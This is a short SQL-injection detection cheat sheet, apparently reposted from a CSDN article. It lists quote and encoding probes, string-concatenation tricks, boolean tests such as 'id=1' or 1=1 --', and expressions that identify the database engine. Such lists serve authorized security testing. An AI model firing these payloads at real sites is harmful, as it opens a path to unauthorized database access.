Detecting injection
Simple characters
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
&apos; # required for XML content
Encoding
%%2727
%25%27
Merging characters
`+HERP
'||'DERP
"+"HERP
''DERP
'%20'HERP
"%2B"HERP
Logic testing
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1 and 1=2 -- false
DBMS identification
["conv('a',16,2)=conv('a',16,2)", "MYSQL"],
["connection_id()=connection_id()", "MYSQL"],
["crc32('MySQL')=crc32('MySQL')", "MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)", "MSSQL"],
["@@CONNECTIONS>0", "MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS", "MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY", "MSSQL"],
["USER_ID(1)=USER_ID(1)", "MSSQL"],
["ROWNUM=ROWNUM", "ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')", "ORACLE"],
["LNNVL(0=123)", "ORACLE"],
["5::int=5", "POSTGRESQL"],
["5::integer=5", "POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()", "POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()", "POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)", "POSTGRESQL"],
["current_database()=current_database()", "POSTGRESQL"],
["sqlite_version()=sqlite_version()", "SQLITE"],
["last_insert_rowid()>1", "SQLITE"],
["last_insert_rowid()=last_insert_rowid()", "SQLITE"],
["val(cvar(1))=1", "MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0", "MSACCESS"],
["cdbl(1)=cdbl(1)", "MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
Original article by CSDN. If you repost it, please credit the source: https://www.sudun.com/ask/93757.html